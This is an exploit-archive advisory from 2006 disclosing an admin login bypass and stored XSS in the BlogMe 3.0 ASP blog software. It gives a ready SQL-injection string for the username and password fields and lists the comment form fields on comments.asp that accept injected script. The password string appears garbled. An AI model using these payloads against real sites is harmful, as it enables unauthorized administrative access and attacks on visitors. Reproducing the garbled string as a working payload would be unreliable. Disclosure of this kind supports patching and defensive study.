BlogMe 3.0 (XSS/Auth Bypass) Multiple Remote Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BlogMe 3.0 (XSS/Auth Bypass) Multiple Remote Vulnerabilities
# Published : 2006-11-14
# Author : Security Access Point
# Previous Title : ASP Smiley 1.0 (default.asp) Login ByPass SQL Injection Vulnerability
# Next Title : NetVIOS <= 2.0 (page.asp) Remote SQL Injection Vulnerability

blogme v3 [admin login bypass & xss (post)]
vendor site:http://www.drumster.net/
product:blogme v3
bug:login bypass & xss (post)
risk:high


admin login bypass :
user : ' or '1' = '1
passwd:  1'='1' ro '

xss post :
in: /comments.asp?blog=85  
vulnerables fields:
- Name 
- URL
- Comments


laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com

# www.Syue.com [2006-11-14]